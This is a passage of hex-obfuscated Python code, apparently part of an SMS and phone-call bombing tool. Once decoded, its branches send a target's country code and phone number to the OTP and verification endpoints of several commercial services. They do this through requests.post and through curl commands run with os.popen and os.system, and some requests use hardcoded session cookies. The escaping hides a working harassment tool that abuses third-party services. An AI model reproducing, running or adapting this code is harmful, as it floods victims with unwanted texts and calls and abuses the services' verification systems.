2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x22\x3a\x63\x63\x2c\x22\x70\x68\x6f\x6e\x65\x5f\x6e\x75\x6d\x62\x65\x72\x22\x3a\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x63\x6c\x6f\x75\x64\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x76\x65\x72\x69\x66\x79\x3f\x64\x6f\x6d\x61\x69\x6e\x3d\x49\x4e\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x20\x3d\x3d
\x20\x27\x32\x34\x66\x34\x36\x37\x62\x32\x34\x30\x38\x37\x66\x66\x34\x38\x63\x39\x36\x33\x32\x31\x37\x38\x36\x64\x38\x39\x63\x36\x39\x66\x27\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x35\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x66\x72\x6f\x6e\x74\x65\x6e\x64\x27\x3a\x20\x27\x61\x32\x37\x6d\x6e\x33\x68\x33\x69\x72\x74\x31\x72\x6c\x74\x36\x69\x35\x35\x73\x39\x33\x70\x39\x72\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x72\x6f\x6e\x74\x65\x6e\x64\x5f\x63\x69\x64\x27\x3a\x20\x27\x38\x7a\x71\x42\x42\x7a\x77\x51\x54\x4d\x49\x74\x39\x55\x4b\x67\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x42\x45\x41\x4d\x45\x52\x5f\x55\x53\x45\x52\x5f\x49\x44\x5f\x67\x41\x44\x72\x79\x63\x42\x6e\x31\x32\x38\x37\x30\x27\x3a\x20\x27\x63\x39\x66\x65\x34\x66\x37\x64\x2d\x62\x34\x32\x31\x2d\x34\x62\x61\x64\x2d\x39\x63\x66\x32\x2d\x30\x61\x34\x64\x62\x37\x31\x36\x64\x66\x66\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x27\x3a\x20\x27\x67\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x31\x30\x31\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c
\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x2c\x61\x72\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x65\x6d\x61\x69\x6c\x27\x3a\x20\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x69\x72\x73\x74\x6e\x61\x6d\x65\x27\x3a\x20\x27\x53\x70\x65\x65\x64\x58\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x61\x73\x74\x6e\x61\x6d\x65\x27\x3a\x20\x27\x53\x70\x65\x65\x64\x58\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x2f\x61\x63\x63\x75\x73\x74\x6f\x6d\x65\x72\x2f\x61\x6a\x61\x78\x2f\x67\x65\x74\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x27\x63\x6f\x64\x65\x3a\x27\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x36\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x65\x74\x68\x6f\x64\x27\x3a\x20\x27\x53\x4d\x53\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65\x27\x3a\x20\x27\x69\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x70\x68\x6f\x6e\x65\x4e\x75\x6d\x62\x65\x72\x27\x3a\x20\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27
\x74\x65\x6d\x70\x6c\x61\x74\x65\x49\x44\x27\x3a\x20\x27\x70\x61\x78\x5f\x61\x6e\x64\x72\x6f\x69\x64\x5f\x70\x72\x6f\x64\x75\x63\x74\x69\x6f\x6e\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x67\x72\x61\x62\x2e\x63\x6f\x6d\x2f\x67\x72\x61\x62\x69\x64\x2f\x76\x31\x2f\x70\x68\x6f\x6e\x65\x2f\x6f\x74\x70\x27\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x47\x45\x54\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6d\x61\x6b\x61\x61\x6e\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x73\x2f\x6e\x63\x2f\x73\x65\x6e\x64\x4f\x74\x70\x4f\x6e\x43\x61\x6c\x6c\x2f\x31\x36\x32\x35\x37\x30\x36\x35\x2f\x27\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x6e\x20\x2b\x20\x27\x3f\x63\x61\x6c\x6c\x54\x79\x70\x65\x3d\x6f\x74\x70\x4f\x6e\x43\x61\x6c\x6c\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x6e\x65\x77\x20\x6f\x74\x70\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x64\x20\x6d\x6f\x62\x69\x6c\x65\x3d\x25\x32\x42\x27\x20\x2b\x20\x63\x63\x20\x2b\x20\x27\x2d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x20\x20\x20\x20\x27\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x72\x6b\x65\x74\x69\x6e\x67\x2e\x74\x6c\x6c\x6d\x73\x2e\x63\x6f\x6d\x2f\x65\x6c\x65\x61\x72\x6e\x2f\x61\x70\x69\x2f\x76\x34\x2f\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x69\x6f\x6e\x73\x2f\x70\x68\x6f\x6e\x65\x5f\x63\x61\x6c\x6c\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x6f\x74\x70\x20\x72\x65\x71\x75\x65\x73\x74\x73\x20\x65\x78\x63\x65\x65\x64\x65\x64\x22\x29\x20\x3d\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x35\x38\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x3a\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x22\x20\x2d\x48\x20\x22\x6f\x72\x69\x67\x69\x6e\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x78\x2d\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x77\x69\x74\x68\x3a\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x22\x20\x2d\x48\x20\x22\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x3a\x6f\x6e\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68
\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x22\x20\x2d\x48\x20\x22\x72\x65\x66\x65\x72\x65\x72\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x2f\x74\x68\x61\x6e\x6b\x73\x2e\x70\x68\x70\x3f\x6e\x65\x77\x72\x65\x67\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x74\x3d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x6d\x6f\x62\x69\x6c\x65\x5f\x76\x65\x72\x69\x66\x79\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x65\x6d\x61\x69\x6c\x5f\x76\x65\x72\x69\x66\x79\x5f\x73\x74\x61\x74\x75\x73\x3d\x4e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x62\x6c\x6f\x63\x6b\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x63\x6f\x75\x6e\x74\x72\x79\x3d\x49\x4e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x70\x61\x69\x64\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d
\x62\x65\x72\x5f\x74\x79\x70\x65\x3d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x65\x6d\x61\x69\x6c\x3d\x46\x61\x6b\x65\x6d\x61\x6d\x25\x34\x30\x72\x69\x6c\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x6e\x61\x6d\x65\x3d\x46\x61\x6b\x65\x6d\x61\x6e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x69\x64\x3d\x31\x35\x34\x37\x30\x34\x35\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x63\x6f\x6f\x6b\x69\x5f\x73\x65\x73\x73\x5f\x69\x64\x3d\x39\x71\x38\x62\x73\x75\x63\x6a\x36\x6d\x67\x76\x75\x32\x64\x63\x30\x33\x62\x66\x73\x76\x6c\x66\x30\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6e\x61\x6d\x65\x3d\x39\x71\x38\x62\x73\x75\x63\x6a\x36\x6d\x67\x76\x75\x32\x64\x63\x30\x33\x62\x66\x73\x76\x6c\x66\x30\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x69\x64\x3d\x47\x41\x31\x2e\x32\x2e\x36\x32\x36\x35\x32\x35\x39\x30\x39\x2e\x31\x35\x36\x30\x38\x33\x36\x33\x36\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x3d\x47\x41\x31\x2e\x32\x2e\x31\x30\x33\x33\x30\x37\x39\x33\x33\x31\x2e\x31\x35\x36\x30\x38\x33\x36\x33\x36\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x76\x69\x73\x69\x74\x65\x64\x54\x6f\x6b\x65\x6e\x3d\x31\x37\x36\x39\x36\x31\x35\x36\x30\x38\x33\x36\x33\x36\x37\x22\x20\x2d\x64\x20\x5c\x27\x61\x63\x74\x69\x6f\x6e\x5f\x69\x64\x3d\x63\x61\x6c\x6c\x5f\x74\x6f\x5f\x6f\x74\x70\x26\x6d\x6f\x62\x5f\x6e\x75\x6d\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x26\x6d\x65\x6d\x62\x65\x72\x5f\x69\x64\x3d\x31\x35\x34\x37\x30\x34\x35\x5c\x27\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x73\x63\x72\x69\x70\x74\x2f\x69\x6e\x64\x69\x61\x6e\x5f\x6d\x6f\x62\x69\x6c\x65\x5f\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x5f\x66\x6f\x72\x6d\x2e
\x70\x68\x70\x3f\x73\x69\x64\x3d\x30\x2e\x35\x39\x38\x33\x32\x32\x31\x33\x39\x35\x38\x30\x35\x33\x35\x34\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x79\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x73\x2e\x73\x79\x73\x74\x65\x6d\x28\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x34\x34\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x3a\x2a\x2f\x2a\x22\x20\x2d\x48\x20\x22\x78\x2d\x6e\x65\x77\x72\x65\x6c\x69\x63\x2d\x69\x64\x3a\x56\x51\x4d\x47\x55\x31\x5a\x56\x44\x78\x41\x42\x55\x31\x6c\x62\x42\x67\x4d\x44\x55\x6c\x49\x3d\x22\x20\x2d\x48\x20\x22\x6f\x72\x69\x67\x69\x6e\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x35\x2e\x30\x2e\x32\x3b\x20\x53\x48\x2d\x30\x34\x47\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x22\x20\x2d\x48\x20\x22\x72\x65\x66\x65\x72\x65\x72\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x2f\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70
\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6f\x6e\x61\x70\x3d\x31\x36\x62\x31\x62\x38\x66\x34\x38\x64\x34\x78\x37\x34\x36\x64\x34\x37\x61\x62\x2d\x31\x2d\x31\x36\x62\x31\x62\x38\x66\x34\x38\x64\x34\x78\x37\x34\x36\x64\x34\x37\x61\x62\x2d\x31\x39\x2d\x31\x35\x35\x39\x35\x33\x37\x33\x34\x35\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x62\x6d\x5f\x73\x76\x3d\x43\x44\x42\x39\x37\x46\x35\x30\x44\x41\x36\x36\x31\x35\x41\x43\x34\x32\x30\x46\x33\x45\x36\x45\x37\x37\x42\x30\x34\x45\x34\x32\x7e\x4f\x6f\x58\x32\x66\x41\x75\x50\x37\x67\x67\x63\x4e\x61\x30\x56\x6a\x7a\x45\x39\x35\x46\x7a\x4a\x4e\x4b\x52\x64\x4a\x6c\x57\x30\x39\x48\x6a\x61\x30\x2f\x63\x79\x73\x49\x47\x46\x31\x73\x4a\x6f\x42\x4f\x37\x69\x30\x6e\x64\x47\x58